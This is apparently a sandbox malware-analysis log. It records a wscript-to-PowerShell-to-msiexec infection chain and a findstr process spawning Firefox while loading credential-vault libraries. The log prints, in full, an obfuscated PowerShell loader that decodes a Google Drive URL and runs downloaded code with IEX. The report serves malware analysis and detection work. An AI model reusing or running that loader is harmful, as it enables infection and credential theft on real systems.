Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZoo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeProcess created: C:\Windows\SysWOW64\poqexec.exe "C:\Windows\SysWOW64\poqexec.exe"
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
              Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZooJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeProcess created: C:\Windows\SysWOW64\poqexec.exe "C:\Windows\SysWOW64\poqexec.exe"Jump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: mrmcorer.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: biwinrt.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: windows.networking.backgroundtransfer.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: profext.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\BackgroundTransferHost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: cryptbase.dllJump to behavior
